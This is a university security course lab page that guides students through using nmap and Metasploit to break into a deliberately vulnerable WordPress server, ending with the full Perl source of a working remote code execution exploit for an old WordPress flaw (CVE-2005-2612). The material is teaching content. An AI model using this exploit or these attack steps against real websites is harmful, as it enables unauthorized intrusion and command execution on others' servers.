Secure computer systems
- News
- Overview
- Groups
- Examination
- PM
- Labs
- Results
- FAQ
- Litterature
- Links

If you want to do this lab after the scheduled class you must talk to Magnus first. If you don't do this the computer you will break into will not be available. It is only available on request.

Be a script kiddie

In this lab you will break into a computer which is running a vulnerable version of WordPress (http://www.wordpress.org ), a very common piece of software which runs many blogs on the web. You will use a tool called Metasploit (http://www.metasploit.com/ ) to this. Metasploit is a tool for exploiting known vulnerabilities on a remote computer.

WordPress is written in PHP and uses a MySQL backend for storing the blogs and comments. Metasploit is mostly written in Perl.

1. Objectives

The main objective of this lab is to show how easy it is to get unauthorized access to another computer on the internet. This will help you understand how important computer security is and hopefully open your eyes regarding your own computer. Our goal is not to make you criminals, just to make you aware of the problems.

What we will not do in this lab is trying to find a vulnerable computer in the first place. However, we encourage you to use e.g. nmap (http://insecure.org/nmap/ ) or Nessus (http://www.nessus.org/nessus/ ) to find out if your own computer is vulnerable. These tools scan computers and try, to various extents, to find out what software is running on them. A quick and easy way to test your own computer is to use http://www.testadatorn.se . This is a service run by PTS (Post&Telestyrelsen) which uses Nessus to scan your computer.

Note: DO NOT run tools such as these targetting computers which are not your own. Doing this may be considered an attempt to break in, and may be illegal.

2. Lab description

In this lab you will use the Metasploit Framework. The Metasploit Framework is a open source tool used for executing malicious (exploit) code against a remote chosen machine. The framework comes with a long list of pre-made exploits that can be used to break into a computer. What the user has to know is some information about the remote machine like operating system and network services. This information is used for choosing the exploit. After breaking into the computer, the tool can deliver some payloads (code that is executed on the remote host after intrusion) to that computer.

The computer you are breaking into has been prepared by us. We have installed vulnerable software on it so you can use a Metasploit exploit to get into it. You have our explicit permission to do this!

3. Step by step

These instructions apply when doing the lab in room 1312 on Friday, September 28. Additional instructions will be available for doing the lab from your own computer, or from the department's Solaris systems.

First boot the computer using the CD provided by us. This is a "live CD" that will boot a linux system called Knoppix (http://www.knoppix.net ) that has been prepared with the metasploit program. If it fails to boot, restart the computer and try to type knoppix nodma at the boot prompt. If you want to know what this parameter does you should take the course on operating systems this spring.

Since it is a live CD, no information will be stored on the harddrive. Things you store will be lost when you shut down. We encourage you to use pen and paper to take notes during the lab. There are of course other solutions to this problem which you may explore on your own.

Open a webbrowser (e.g. firefox) and surf to http://bakterie.it.uu.se , just to take a look at the WordPress blog.
Open a command shell and run nmap against bakterie.it.uu.se: nmap -A bakterie.it.uu.se. The -A flag will try to give more information about the software that is running on the computer. You should at least find a webserver there.
Start metasploit by entering /opt/framework-2.7/msfconsole in the command shell.
Type show exploits to see what exploits are available. For this lab we use the php_wordpress_lastpost exploit.
To use an exploit type use exploit_name.
Now type show options to see the options that are available for this exploit. One thing that we need to modify is the RHOST option which is the remote computer we are going to attack.
Type set RHOST bakterie.it.uu.se to change RHOST.
Now we can look at the payloads for this exploit. Remember a payload is code that will delivered to the remote computer. Use show payloads. We will use the cdm_generic exploit. Type set PAYLOAD cmd_generic to use it. This is used for executing arbitrary commands on the remote computer.
If we look at the options again, with show options we can see that we have an option for the payload. You can set CMD to the command you want to execute. Let's start with a simple command: set CMD whoami.
After setting the command you have to type exploit to actually execute it.

By changing the CMD you can execute any command of your choice. Some suggestions are:

whoami: This will tell you which user you are on the remote computer.
id: This will tell you even more about who you are.
ls -lF: List the files in the current directory.
echo "Your greeting to the lab assistants." > YourName.txt: This will put the greeting into the file YourName.txt. This is necessary to pass the lab.
cat YourName.txt: This will show you the contents of the file YourName.txt

Note! Due to the nature of this lab you will have the power to delete files created by other students. Don't do that.

4. Questions

Describe what network services are available locally on the attacked computer. What (if anything) is different from the services available from the outside? Why is it like this? Is it desirable?
If you really were a malicious attacker, how would your attack proceed after getting access to a computer like this? What would you try next?
Explain how the exploit works in principle. What is going on here? The source code to the exploit is listed below, but you should be able to have an educated guess even without it.

In addition to answering the questions above, to pass the lab you also need to leave a greeting on the cracked computer in a file with your name.

Please also use the reflection system to reflect on the lab!

5. Hand-in instructions

If you use sources other than the course book ("Computer Security" by Dieter Gollman), you must! give clear references to these sources (book title and author, URL, etc).

Your answers may be written in English or Swedish, whichever you find easier.

You should send the hand-in either

as a signed email from each group member - make sure the contents are identical! Sign the email with certificates which includes your student email addresses.
if you cannot sign the email for some reason, as a regular email plus a printed version with manual signatures (by all group members who are handing in this way). Put the printed hand-in in the mailbox of Magnus Johansson, outside room 1446 (MIC building 1, fourth floor).

Send the email to and . Please use the subject "sec-cs: lab 2 handin" to make mail sorting easier!

5.1. Deadline

The deadline for handing in is Sunday, October 7, 17:00 - but please hand in sooner!!

6. Exploit source code

##
#        Title:  Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)
#    Name: php_wordpress.pm
# License: Artistic/BSD/GPL
#         Info: I lub metasploit yummmm (str0ke ! milw0rm.com).
#
# Recoded Kartoffelguru's php code for metasploit.  I love cookies. /str0ke
#
#
#
#  - This is an exploit module for the Metasploit Framework, please see
#     http://metasploit.com/projects/Framework for more information.
#
##

package Msf::Exploit::php_wordpress_lastpost;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info = {
	'Name'     => 'WordPress cache_lastpostdate Arbitrary Code Execution',
	'Version'  => '$Rev: 3818 $',
	'Authors'  => [ 'str0ke < str0ke [at] milw0rm.com >' ],
	'Arch'     => [ ],
	'OS'       => [ ],
	'Priv'     => 0,
	'UserOpts' =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 80],
		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
		'RPATH' => [1, 'DATA', 'Path WordPress root directory', '/'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },

	'Description' => Pex::Text::Freeform(qq{
            This module exploits an arbitrary PHP code execution flaw in the WordPress
		blogging software. This vulnerability is only present when the PHP 'register_globals'
		option is enabled (common for hosting providers). All versions of WordPress prior to
		1.5.1.3 are affected.
}),

	'Refs' =>
	  [
		['OSVDB', '18672'],
		['CVE', '2005-2612'],
		['BID', '14533'],
		['MIL', '86'],
	  ],

	'Payload' =>
	  {
		'Space' => 512,
		'Keys'  => ['cmd', 'cmd_bash'],
	  },

	'Keys' => ['wordpress'],

	'DisclosureDate' => 'Aug 9 2005',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host    = $self->GetVar('RHOST');
	my $target_port    = $self->GetVar('RPORT');
	my $vhost          = $self->GetVar('VHOST') || $target_host;
	my $path           = $self->GetVar('RPATH');
	my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;

	# Add an echo on each end for easy output capturing
	$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";

	my $encoded = Pex::Text::Base64Encode("passthru(\"$cmd\");", '');

	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $encoded));
	$byte .= ".chr(32)";

	my $str = Pex::Text::Base64Encode('args[0]=eval(base64_decode('.$byte.')).die()&args[1]=x', '');

	my $data = "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;".
	  "wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;".
	  "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=$str".
	  ";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;".
	  "wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;".
	  "wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;";

	my $req =
	  "GET $path HTTP/1.0\r\n".
	  "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n".
	  "Host: $vhost:$target_port\r\n".
	  "Pragma: no-cache\r\n".
	  "Accept: */*\r\n".
	  "Cookie: $data\r\n".
	  "\r\n";

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),

	  );

	if ($s->IsError){
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$self->PrintLine("[*] Sending the malicious WordPress request...");

	$s->Send($req);

	my $results = $s->Recv(-1, 20);
	$s->Close();

	if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
		my $out = $1;
		$out =~ s/^\s+|\s+$//gs;
		if ($out) {
			$self->PrintLine('----------------------------------------');
			$self->PrintLine('');
			$self->PrintLine($out);
			$self->PrintLine('');
			$self->PrintLine('----------------------------------------');
		}
	}
	return;
}

1;